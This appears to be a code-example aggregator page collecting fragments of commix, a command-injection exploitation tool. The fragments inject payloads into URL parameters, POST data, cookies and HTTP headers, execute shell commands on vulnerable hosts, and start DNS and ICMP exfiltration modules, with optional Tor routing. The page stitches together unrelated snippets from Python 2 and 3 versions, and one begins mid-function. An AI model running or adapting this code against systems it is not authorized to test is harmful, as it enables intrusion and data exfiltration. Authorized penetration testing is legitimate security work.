		sys.stdout.write("\n" + colors.GREY + payload + colors.RESET)

	    start = 0
	    end = 0
	    start = time.time()
	    
	    # Check if defined method is GET (Default).
	    if http_request_method == "GET":
	      
	      # Check if its not specified the 'INJECT_HERE' tag
	      url = parameters.do_GET_check(url)
	      
	      # Encoding non-ASCII characters payload.
	      payload = urllib.quote(payload)
	      
	      # Define the vulnerable parameter
	      vuln_parameter = parameters.vuln_GET_param(url)
		
	      target = re.sub(settings.INJECT_TAG, payload, url)
	      request = urllib2.Request(target)
	      
	      # Check if defined extra headers.
	      headers.do_check(request)
	      
	      # Check if defined any HTTP Proxy.
	      if menu.options.proxy:
		try:
		  proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
		  opener = urllib2.build_opener(proxy)
		  urllib2.install_opener(opener)
		  response = urllib2.urlopen(request)
		  response.read()
		  
		except urllib2.HTTPError, err:
		  print "\n(x) Error : " + str(err)
		  sys.exit(1) 
	  
	      else:
		response = urllib2.urlopen(request)
		response.read()
		
	    # Check if defined method is POST.
	    else:
	      
	      parameter = menu.options.data
	      parameter = urllib2.unquote(parameter)
	      
	      # Check if its not specified the 'INJECT_HERE' tag
	      parameter = parameters.do_POST_check(parameter)
	      
	      # Define the vulnerable parameter
	      vuln_parameter = parameters.vuln_POST_param(parameter,url)
	      
	      # Define the POST data
	      data = re.sub(settings.INJECT_TAG, payload, parameter)
	      request = urllib2.Request(url, data)
	      	      
	      # Check if defined extra headers.
	      headers.do_check(request)
	      
	      # Check if defined any HTTP Proxy.
	      if menu.options.proxy:
		try:
		  proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
		  opener = urllib2.build_opener(proxy)
		  urllib2.install_opener(opener)
		  response = urllib2.urlopen(request)
		  response.read()
		  
		except urllib2.HTTPError, err:
		  print "\n(x) Error : " + str(err)
		  sys.exit(1) 
	  
	      else:
		response = urllib2.urlopen(request)
		response.read()
		
	    end  = time.time()
	    how_long = int(end - start)

	  except:
コード例 #26
0
def dns_exfiltration_handler(url, http_request_method):
    # Check injection state
    settings.DETECTION_PHASE = True
    settings.EXPLOITATION_PHASE = False
    # You need to have root privileges to run this script
    if os.geteuid() != 0:
        err_msg = "You need to have root privileges to run this option."
        print("\n" + settings.print_critical_msg(err_msg))
        os._exit(0)

    if http_request_method == "GET":
        #url = parameters.do_GET_check(url)
        vuln_parameter = parameters.vuln_GET_param(url)
        request = _urllib.request.Request(url)
        headers.do_check(request)

    else:
        parameter = menu.options.data
        parameter = _urllib.parse.unquote(parameter)
        parameter = parameters.do_POST_check(parameter)
        request = _urllib.request.Request(url, parameter)
        headers.do_check(request)
        vuln_parameter = parameters.vuln_POST_param(parameter, url)

    # Check if defined any HTTP Proxy.
    if menu.options.proxy:
        try:
            response = proxy.use_proxy(request)
        except _urllib.error.HTTPError as err_msg:
            if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
                response = False
            elif settings.IGNORE_ERR_MSG == False:
                err = str(err_msg) + "."
                print("\n") + settings.print_critical_msg(err)
                continue_tests = checks.continue_tests(err_msg)
                if continue_tests == True:
                    settings.IGNORE_ERR_MSG = True
                else:
                    os._exit(0)

    # Check if defined Tor.
    elif menu.options.tor:
        try:
            response = tor.use_tor(request)
        except _urllib.error.HTTPError as err_msg:
            if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
                response = False
            elif settings.IGNORE_ERR_MSG == False:
                err = str(err_msg) + "."
                print("\n") + settings.print_critical_msg(err)
                continue_tests = checks.continue_tests(err_msg)
                if continue_tests == True:
                    settings.IGNORE_ERR_MSG = True
                else:
                    os._exit(0)

    else:
        try:
            response = _urllib.request.urlopen(request)
        except _urllib.error.HTTPError as err_msg:
            if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
                response = False
            elif settings.IGNORE_ERR_MSG == False:
                err = str(err_msg) + "."
                print("\n") + settings.print_critical_msg(err)
                continue_tests = checks.continue_tests(err_msg)
                if continue_tests == True:
                    settings.IGNORE_ERR_MSG = True
                else:
                    os._exit(0)

    if settings.TARGET_OS == "win":
        err_msg = "This module's payloads are not suppoted by "
        err_msg += "the identified target operating system."
        print(settings.print_critical_msg(err_msg) + "\n")
        os._exit(0)

    else:
        dns_server = menu.options.dns_server
        technique = "DNS exfiltration module"
        info_msg = "Loading the " + technique + ". \n"
        sys.stdout.write(settings.print_info_msg(info_msg))
        exploitation(dns_server, url, http_request_method, vuln_parameter,
                     technique)
コード例 #27
0
def icmp_exfiltration_handler(url, http_request_method):
    # Check injection state
    settings.DETECTION_PHASE = True
    settings.EXPLOITATION_PHASE = False
    # You need to have root privileges to run this script
    if os.geteuid() != 0:
        err_msg = "You need to have root privileges to run this option."
        print(settings.print_critical_msg(err_msg) + "\n")
        os._exit(0)

    if not menu.options.data:
        #url = parameters.do_GET_check(url, http_request_method)
        request = _urllib.request.Request(url)
        headers.do_check(request)
        vuln_parameter = parameters.vuln_GET_param(url)

    else:
        parameter = menu.options.data
        parameter = _urllib.parse.unquote(parameter)
        parameter = parameters.do_POST_check(parameter, http_request_method)
        request = _urllib.request.Request(url, parameter)
        headers.do_check(request)
        vuln_parameter = parameters.vuln_POST_param(parameter, url)

    # Check if defined any HTTP Proxy.
    if menu.options.proxy:
        try:
            response = proxy.use_proxy(request)
        except _urllib.error.HTTPError as err_msg:
            if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR or str(
                    err_msg.code) == settings.BAD_REQUEST:
                response = False
            elif settings.IGNORE_ERR_MSG == False:
                err = str(err_msg) + "."
                print("\n" + settings.print_critical_msg(err))
                continue_tests = checks.continue_tests(err_msg)
                if continue_tests == True:
                    settings.IGNORE_ERR_MSG = True
                else:
                    os._exit(0)

    # Check if defined Tor.
    elif menu.options.tor:
        try:
            response = tor.use_tor(request)
        except _urllib.error.HTTPError as err_msg:
            if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR or str(
                    err_msg.code) == settings.BAD_REQUEST:
                response = False
            elif settings.IGNORE_ERR_MSG == False:
                err = str(err_msg) + "."
                print("\n" + settings.print_critical_msg(err))
                continue_tests = checks.continue_tests(err_msg)
                if continue_tests == True:
                    settings.IGNORE_ERR_MSG = True
                else:
                    os._exit(0)

    else:
        try:
            response = _urllib.request.urlopen(request,
                                               timeout=settings.TIMEOUT)
        except _urllib.error.HTTPError as err_msg:
            if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR or str(
                    err_msg.code) == settings.BAD_REQUEST:
                response = False
            elif settings.IGNORE_ERR_MSG == False:
                err = str(err_msg) + "."
                print("\n" + settings.print_critical_msg(err))
                continue_tests = checks.continue_tests(err_msg)
                if continue_tests == True:
                    settings.IGNORE_ERR_MSG = True
                else:
                    os._exit(0)

    if settings.TARGET_OS == "win":
        err_msg = "This module's payloads are not suppoted by "
        err_msg += "the identified target operating system."
        print(settings.print_critical_msg(err_msg) + "\n")
        os._exit(0)

    else:
        technique = "ICMP exfiltration module"
        info_msg = "Loading the " + technique + ". \n"
        sys.stdout.write(settings.print_info_msg(info_msg))
        sys.stdout.flush()

        ip_data = menu.options.ip_icmp_data

        #  Source IP address
        ip_src = re.findall(r"ip_src=(.*),", ip_data)
        ip_src = ''.join(ip_src)

        # Destination IP address
        ip_dst = re.findall(r"ip_dst=(.*)", ip_data)
        ip_dst = ''.join(ip_dst)

        exploitation(ip_dst, ip_src, url, http_request_method, vuln_parameter,
                     technique)
コード例 #28
0
def do_check(url, filename):

    classic_state = False
    eval_based_state = False
    time_based_state = False
    file_based_state = False

    # Check if defined "--delay" option.
    if menu.options.delay:
        delay = menu.options.delay
    else:
        delay = settings.DELAY

    # Check if authentication is needed.
    if menu.options.auth_url and menu.options.auth_data:
        # Do the authentication process.
        authentication.authentication_process()
        # Check if authentication page is the same with the next (injection) URL
        if urllib2.urlopen(url).read() == urllib2.urlopen(
                menu.options.auth_url).read():
            print Back.RED + settings.ERROR_SIGN + "It seems that the authentication procedure has failed." + Style.RESET_ALL
            sys.exit(0)
    elif menu.options.auth_url or menu.options.auth_data:
        print Back.RED + settings.ERROR_SIGN + "You must specify both login panel URL and login parameters." + Style.RESET_ALL
        sys.exit(0)
    else:
        pass

    # Check if HTTP Method is GET or POST.
    header_name = ""
    if not menu.options.data:
        http_request_method = "GET"
        if not settings.COOKIE_INJECTION \
        and not settings.USER_AGENT_INJECTION \
        and not settings.REFERER_INJECTION:
            url = parameters.do_GET_check(url)
        check_parameter = parameters.vuln_GET_param(url)
        the_type = " parameter "

    else:
        http_request_method = "POST"
        parameter = menu.options.data
        parameter = parameters.do_POST_check(parameter)
        check_parameter = parameters.vuln_POST_param(parameter, url)
        the_type = " parameter "

    # Load modules
    modules_handler.load_modules(url, http_request_method, filename)

    # Cookie Injection
    if settings.COOKIE_INJECTION == True:
        header_name = " Cookie"
        settings.HTTP_HEADER = header_name[1:].lower()
        check_parameter = parameters.specify_cookie_parameter(
            menu.options.cookie)
        the_type = " HTTP header "

    # User-Agent Injection
    elif settings.USER_AGENT_INJECTION == True:
        header_name = " User-Agent"
        settings.HTTP_HEADER = header_name[1:].replace("-", "").lower()
        check_parameter = ""
        the_type = " HTTP header "

    # Referer Injection
    elif settings.REFERER_INJECTION == True:
        header_name = " Referer"
        settings.HTTP_HEADER = header_name[1:].lower()
        check_parameter = ""
        the_type = " HTTP header "

    if len(check_parameter) > 0:
        settings.TESTABLE_PARAMETER = check_parameter

    # Check for session file
    if not menu.options.ignore_session:
        if os.path.isfile(settings.SESSION_FILE):
            if not menu.options.tech:
                menu.options.tech = session_handler.applied_techniques(
                    url, http_request_method)
            if session_handler.check_stored_parameter(url,
                                                      http_request_method):
                settings.LOAD_SESSION = True

    if menu.options.flush_session:
        session_handler.flush(url)

    if len(check_parameter) != 0:
        check_parameter = " '" + check_parameter + "'"

    print settings.INFO_SIGN + "Setting the " + "(" + http_request_method + ")" + check_parameter + header_name + the_type + "for tests."

    # Estimating the response time (in seconds)
    delay, url_time_response = requests.estimate_response_time(
        url, http_request_method, delay)

    # Check if it is vulnerable to classic command injection technique.
    if not menu.options.tech or "c" in menu.options.tech:
        if cb_handler.exploitation(url, delay, filename,
                                   http_request_method) != False:
            classic_state = True
    else:
        classic_state = False

    # Check if it is vulnerable to eval-based code injection technique.
    if not menu.options.tech or "e" in menu.options.tech:
        if eb_handler.exploitation(url, delay, filename,
                                   http_request_method) != False:
            eval_based_state = True
    else:
        eval_based_state = False

    # Check if it is vulnerable to time-based blind command injection technique.
    if not menu.options.tech or "t" in menu.options.tech:
        if tb_handler.exploitation(url, delay, filename, http_request_method,
                                   url_time_response) != False:
            time_based_state = True
    else:
        time_based_state = False

    # Check if it is vulnerable to file-based semiblind command injection technique.
    if not menu.options.tech or "f" in menu.options.tech:
        if fb_handler.exploitation(url, delay, filename, http_request_method,
                                   url_time_response) != False:
            file_based_state = True
    else:
        file_based_state = False

    if classic_state == eval_based_state == time_based_state == file_based_state == False:
        info_msg = settings.CRITICAL_SIGN + "The tested (" + http_request_method + ")" + check_parameter + " parameter appear to be not injectable."
        if not menu.options.alter_shell:
            info_msg += " Use the option '--alter-shell'"
        else:
            info_msg += " Remove the option '--alter-shell'"
        info_msg += " and/or try to audit the HTTP headers (i.e 'User-Agent', 'Referer', 'Cookie' etc)."
        print Back.RED + info_msg + Style.RESET_ALL

    sys.exit(0)
コード例 #29
0
ファイル: controller.py プロジェクト: jbrahy/commix
def do_check(url, filename):

  classic_state = False
  eval_based_state = False
  time_based_state = False
  file_based_state = False

  # Check if defined "--delay" option.
  if menu.options.delay:
    delay = menu.options.delay
  else:
    delay = settings.DELAY

  # Check if authentication is needed.
  if menu.options.auth_url and menu.options.auth_data:
    # Do the authentication process.
    authentication.authentication_process()
    # Check if authentication page is the same with the next (injection) URL
    if urllib2.urlopen(url).read() == urllib2.urlopen(menu.options.auth_url).read():
      print Back.RED + settings.ERROR_SIGN + "It seems that the authentication procedure has failed." + Style.RESET_ALL
      sys.exit(0)
  elif menu.options.auth_url or menu.options.auth_data: 
    print Back.RED + settings.ERROR_SIGN + "You must specify both login panel URL and login parameters." + Style.RESET_ALL
    sys.exit(0)
  else:
    pass

  # Check if HTTP Method is GET or POST.
  header_name = ""
  if not menu.options.data:
    http_request_method = "GET"
    if not settings.COOKIE_INJECTION \
    and not settings.USER_AGENT_INJECTION \
    and not settings.REFERER_INJECTION:
      url = parameters.do_GET_check(url)
    check_parameter = parameters.vuln_GET_param(url)
    the_type = " parameter "

  else:
    http_request_method = "POST"
    parameter = menu.options.data
    parameter = parameters.do_POST_check(parameter)
    check_parameter = parameters.vuln_POST_param(parameter, url)
    the_type = " parameter " 
  
  # Load modules
  modules_handler.load_modules(url, http_request_method, filename)

  # Cookie Injection
  if settings.COOKIE_INJECTION == True:
    header_name = " Cookie"
    settings.HTTP_HEADER = header_name[1:].lower()
    check_parameter  = parameters.specify_cookie_parameter(menu.options.cookie)
    the_type = " HTTP header "
            
  # User-Agent Injection
  elif settings.USER_AGENT_INJECTION == True:
    header_name = " User-Agent"
    settings.HTTP_HEADER = header_name[1:].replace("-","").lower()
    check_parameter  = ""
    the_type = " HTTP header "

  # Referer Injection
  elif settings.REFERER_INJECTION == True:
    header_name = " Referer"
    settings.HTTP_HEADER = header_name[1:].lower()
    check_parameter  = ""
    the_type = " HTTP header "

  if len(check_parameter) > 0:
    settings.TESTABLE_PARAMETER = check_parameter

  # Check for session file 
  if not menu.options.ignore_session:
    if os.path.isfile(settings.SESSION_FILE):
      if not menu.options.tech:
          menu.options.tech = session_handler.applied_techniques(url, http_request_method)
      if session_handler.check_stored_parameter(url, http_request_method):
        settings.LOAD_SESSION = True
        
  if menu.options.flush_session:
    session_handler.flush(url)

  if len(check_parameter) != 0 :
    check_parameter = " '" + check_parameter + "'"

  print settings.INFO_SIGN + "Setting the " + "(" + http_request_method + ")" + check_parameter + header_name + the_type + "for tests."

  # Estimating the response time (in seconds)
  delay, url_time_response = requests.estimate_response_time(url, http_request_method, delay)

  # Check if it is vulnerable to classic command injection technique.
  if not menu.options.tech or "c" in menu.options.tech:
    if cb_handler.exploitation(url, delay, filename, http_request_method) != False:
      classic_state = True
  else:
    classic_state = False

  # Check if it is vulnerable to eval-based code injection technique.
  if not menu.options.tech or "e" in menu.options.tech:
    if eb_handler.exploitation(url, delay, filename, http_request_method) != False:
      eval_based_state = True
  else:
    eval_based_state = False

  # Check if it is vulnerable to time-based blind command injection technique.
  if not menu.options.tech or "t" in menu.options.tech:
    if tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
      time_based_state = True
  else:
    time_based_state = False

  # Check if it is vulnerable to file-based semiblind command injection technique.
  if not menu.options.tech or "f" in menu.options.tech:
    if fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
      file_based_state = True
  else:
    file_based_state = False

  if classic_state == eval_based_state == time_based_state == file_based_state == False :
    info_msg = settings.CRITICAL_SIGN + "The tested (" + http_request_method + ")" + check_parameter + " parameter appear to be not injectable."
    if not menu.options.alter_shell :
      info_msg += " Use the option '--alter-shell'"
    else:
      info_msg += " Remove the option '--alter-shell'"
    info_msg += " and/or try to audit the HTTP headers (i.e 'User-Agent', 'Referer', 'Cookie' etc)."
    print Back.RED + info_msg + Style.RESET_ALL  

  sys.exit(0)
コード例 #30
0
ファイル: controller.py プロジェクト: linuxwhy/commix
def do_check(url, filename):

  check_http_headers = False

  # Check if defined "--delay" option.
  if menu.options.delay:
    delay = menu.options.delay
  else:
    delay = settings.DELAY

  # Check if authentication is needed.
  if menu.options.auth_url and menu.options.auth_data:
    # Do the authentication process.
    authentication.authentication_process()
    # Check if authentication page is the same with the next (injection) URL
    if urllib2.urlopen(url).read() == urllib2.urlopen(menu.options.auth_url).read():
      print Back.RED + settings.ERROR_SIGN + "It seems that the authentication procedure has failed." + Style.RESET_ALL
      sys.exit(0)
  elif menu.options.auth_url or menu.options.auth_data: 
    print Back.RED + settings.ERROR_SIGN + "You must specify both login panel URL and login parameters." + Style.RESET_ALL
    sys.exit(0)
  else:
    pass

  # Check if HTTP Method is GET.
  if not menu.options.data:

    # Enable Cookie Injection
    if menu.options.cookie and menu.options.level > 1:
      settings.COOKIE_INJECTION = True

    http_request_method = "GET"

    # Check for stored injections on User-agent / Referer headers (if level > 2).
    if menu.options.level > 2 :
      check_parameter = ""
      stored_http_header_injection(url, check_parameter, check_http_headers, http_request_method, filename, delay)

    # Enable Cookie Injection
    if menu.options.cookie:
      settings.COOKIE_INJECTION = True

    if not settings.COOKIE_INJECTION:
      found_url = parameters.do_GET_check(url)
      if found_url != False:
        for i in range(0, len(found_url)):
          url = found_url[i]
          check_parameter = parameters.vuln_GET_param(url)
          # Check if testable parameter(s) are provided
          if len(settings.TEST_PARAMETER) > 0:
            if check_parameter in settings.TEST_PARAMETER:
              # Check for session file 
              if check_for_stored_sessions(url, http_request_method):
                injection_proccess(url, check_parameter, http_request_method, filename, delay)
          else:
            if check_for_stored_sessions(url, http_request_method):
              injection_proccess(url, check_parameter, http_request_method, filename, delay)

        if not settings.LOAD_SESSION :
          for i in range(0, len(found_url)):
            url = found_url[i]
            check_parameter = parameters.vuln_GET_param(url)
            # Check if testable parameter(s) are provided
            if len(settings.TEST_PARAMETER) > 0:
              if check_parameter in settings.TEST_PARAMETER:
                injection_proccess(url, check_parameter, http_request_method, filename, delay)
            else:
              injection_proccess(url, check_parameter, http_request_method, filename, delay)

  # Check if HTTP Method is POST.      
  else:
    http_request_method = "POST"
    
    # Check for stored injections on User-agent / Referer headers (if level > 2).
    if menu.options.level > 2 :
      check_parameter = ""
      stored_http_header_injection(url, check_parameter, check_http_headers, http_request_method, filename, delay)

    # Check if HTTP Method is POST.
    parameter = menu.options.data
    found_parameter = parameters.do_POST_check(parameter)
    # Remove whitespaces 
    # Check if singe entry parameter
    if type(found_parameter) is str:
      found_parameter_list = []
      found_parameter_list.append(found_parameter)
      found_parameter = found_parameter_list

    # Remove whitespaces   
    found_parameter = [x.replace(" ", "") for x in found_parameter]

    # Check if multiple parameters
    for i in range(0, len(found_parameter)):
      parameter = menu.options.data = found_parameter[i]
      check_parameter = parameters.vuln_POST_param(parameter, url)
      if len(check_parameter) > 0:
        settings.TESTABLE_PARAMETER = check_parameter
      # Check if testable parameter(s) are provided
      if len(settings.TEST_PARAMETER) > 0:
        if check_parameter in settings.TEST_PARAMETER:
          # Check for session file 
          if check_for_stored_sessions(url, http_request_method):
            injection_proccess(url, check_parameter, http_request_method, filename, delay)
      else:
        if check_for_stored_sessions(url, http_request_method):
          injection_proccess(url, check_parameter, http_request_method, filename, delay)

    if not settings.LOAD_SESSION :
      for i in range(0, len(found_parameter)):
        parameter = menu.options.data = found_parameter[i]
        check_parameter =  parameters.vuln_POST_param(parameter, url)
        # Check if testable parameter(s) are provided
        if len(settings.TEST_PARAMETER) > 0:
          if check_parameter in settings.TEST_PARAMETER:
            injection_proccess(url, check_parameter, http_request_method, filename, delay)
        else:
          injection_proccess(url, check_parameter, http_request_method, filename, delay)  

  # Enable Cookie Injection
  if menu.options.cookie and menu.options.level > 1:
    settings.COOKIE_INJECTION = True

  # Cookie Injection
  if settings.COOKIE_INJECTION == True:
    cookie_value = menu.options.cookie
    # Check for stored injections on User-agent / Referer headers (if level > 2).
    if menu.options.level > 2 :
      check_parameter = ""
      stored_http_header_injection(url, check_parameter, check_http_headers, http_request_method, filename, delay)

    header_name = " Cookie"
    settings.HTTP_HEADER = header_name[1:].lower()
    cookie_parameters = parameters.do_cookie_check(menu.options.cookie)
    if type(cookie_parameters) is str:
      cookie_parameters_list = []
      cookie_parameters_list.append(cookie_parameters)
      cookie_parameters = cookie_parameters_list

    # Remove whitespaces 
    cookie_parameters = [x.replace(" ", "") for x in cookie_parameters]

    for i in range(0, len(cookie_parameters)):
      menu.options.cookie = cookie_parameters[i]
      check_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
      if len(check_parameter) > 0:
        settings.TESTABLE_PARAMETER = check_parameter 
      # Check if testable parameter(s) are provided
      if len(settings.TEST_PARAMETER) > 0:
        if check_parameter in settings.TEST_PARAMETER:
          # Check for session file 
          if check_for_stored_sessions(url, http_request_method):
            injection_proccess(url, check_parameter, http_request_method, filename, delay)
      else:
        if check_for_stored_sessions(url, http_request_method):
          injection_proccess(url, check_parameter, http_request_method, filename, delay)

    if not settings.LOAD_SESSION :
      for i in range(0, len(cookie_parameters)):
        menu.options.cookie = cookie_parameters[i]
        check_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
        if len(check_parameter) > 0:
          settings.TESTABLE_PARAMETER = check_parameter 
        # Check if testable parameter(s) are provided
        if len(settings.TEST_PARAMETER) > 0:
          if check_parameter in settings.TEST_PARAMETER:
            injection_proccess(url, check_parameter, http_request_method, filename, delay)
        else:
          injection_proccess(url, check_parameter, http_request_method, filename, delay)
  
  if settings.COOKIE_INJECTION == True:
    # Restore cookie value
    menu.options.cookie = cookie_value
    # Disable cookie injection 
    settings.COOKIE_INJECTION = False

  # Custom header Injection
  if settings.CUSTOM_HEADER_INJECTION == True:
    check_parameter =  header_name = " " + settings.CUSTOM_HEADER_NAME
    settings.HTTP_HEADER = header_name[1:].lower()
    check_for_stored_sessions(url, http_request_method)
    injection_proccess(url, check_parameter, http_request_method, filename, delay)

  # Check for stored injections on User-agent / Referer headers (if level > 2).
  if menu.options.level > 2 :
    check_parameter = ""
    check_http_headers = True
    stored_http_header_injection(url, check_parameter, check_http_headers, http_request_method, filename, delay)

  # All injection techniques seems to be failed!
  if settings.CLASSIC_STATE == settings.EVAL_BASED_STATE == settings.TIME_BASED_STATE == settings.FILE_BASED_STATE == False :
    info_msg = settings.CRITICAL_SIGN + "All the tested (" + http_request_method + ") parameters appear to be not injectable."
    if not menu.options.alter_shell :
      info_msg += " Try to use the option '--alter-shell'"
    else:
      info_msg += " Try to remove the option '--alter-shell'"
    if menu.options.level < 3 :
      info_msg += " and/or try to increase '--level' values to perform more tests (i.e 'User-Agent', 'Referer', 'Cookie' etc)"
    info_msg += "."
    print Back.RED + info_msg + Style.RESET_ALL  
  sys.exit(0)

#eof
コード例 #31
0
    def check_injection(separator, payload, TAG, cmd, prefix, suffix,
                        whitespace, http_request_method, url, vuln_parameter,
                        OUTPUT_TEXTFILE, alter_shell, filename):

        # Execute shell commands on vulnerable host.
        if alter_shell:
            payload = fb_payloads.cmd_execution_alter_shell(
                separator, cmd, OUTPUT_TEXTFILE)
        else:
            payload = fb_payloads.cmd_execution(separator, cmd,
                                                OUTPUT_TEXTFILE)

        # Fix prefixes / suffixes
        payload = parameters.prefixes(payload, prefix)
        payload = parameters.suffixes(payload, suffix)

        # Whitespace fixation
        payload = payload.replace(settings.SINGLE_WHITESPACE, whitespace)

        # Perform payload modification
        payload = checks.perform_payload_modification(payload)

        # Check if defined "--verbose" option.
        if settings.VERBOSITY_LEVEL != 0:
            payload_msg = payload.replace("\n", "\\n")
            if settings.COMMENT in payload_msg:
                payload = payload.split(settings.COMMENT)[0].strip()
                payload_msg = payload_msg.split(settings.COMMENT)[0].strip()
            debug_msg = "Executing the '" + cmd.split(
                settings.COMMENT)[0].strip() + "' command. "
            sys.stdout.write(settings.print_debug_msg(debug_msg))
            sys.stdout.flush()
            output_payload = "\n" + settings.print_payload(payload)
            if settings.VERBOSITY_LEVEL != 0:
                output_payload = output_payload + "\n"
            sys.stdout.write(output_payload)

        # Check if defined cookie with "INJECT_HERE" tag
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
            response = cookie_injection_test(url, vuln_parameter, payload)

        # Check if defined user-agent with "INJECT_HERE" tag
        elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
            response = user_agent_injection_test(url, vuln_parameter, payload)

        # Check if defined referer with "INJECT_HERE" tag
        elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
            response = referer_injection_test(url, vuln_parameter, payload)

        # Check if defined host with "INJECT_HERE" tag
        elif menu.options.host and settings.INJECT_TAG in menu.options.host:
            response = host_injection_test(url, vuln_parameter, payload)

        # Check if defined custom header with "INJECT_HERE" tag
        elif settings.CUSTOM_HEADER_INJECTION:
            response = custom_header_injection_test(url, vuln_parameter,
                                                    payload)

        else:
            # Check if defined POST data
            if not settings.USER_DEFINED_POST_DATA:
                # Check if its not specified the 'INJECT_HERE' tag
                #url = parameters.do_GET_check(url, http_request_method)
                payload = payload.replace(" ", "%20")
                target = url.replace(settings.INJECT_TAG, payload)
                vuln_parameter = ''.join(vuln_parameter)
                request = _urllib.request.Request(target)
                # Check if defined extra headers.
                headers.do_check(request)
                # Get the response of the request
                response = requests.get_request_response(request)

            else:
                # Check if defined method is POST.
                parameter = menu.options.data
                parameter = _urllib.parse.unquote(parameter)
                # Check if its not specified the 'INJECT_HERE' tag
                parameter = parameters.do_POST_check(parameter,
                                                     http_request_method)
                parameter = ''.join(str(e)
                                    for e in parameter).replace("+", "%2B")
                # Define the vulnerable parameter
                vuln_parameter = parameters.vuln_POST_param(parameter, url)
                # Define the POST data
                if settings.IS_JSON:
                    data = parameter.replace(
                        settings.INJECT_TAG,
                        _urllib.parse.unquote(payload.replace("\"", "\\\"")))
                    try:
                        data = checks.json_data(data)
                    except ValueError:
                        pass
                elif settings.IS_XML:
                    data = parameter.replace(settings.INJECT_TAG,
                                             _urllib.parse.unquote(payload))
                else:
                    data = parameter.replace(settings.INJECT_TAG, payload)
                request = _urllib.request.Request(
                    url, data.encode(settings.DEFAULT_CODEC))

                # Check if defined extra headers.
                headers.do_check(request)

                # Get the response of the request
                response = requests.get_request_response(request)
        return response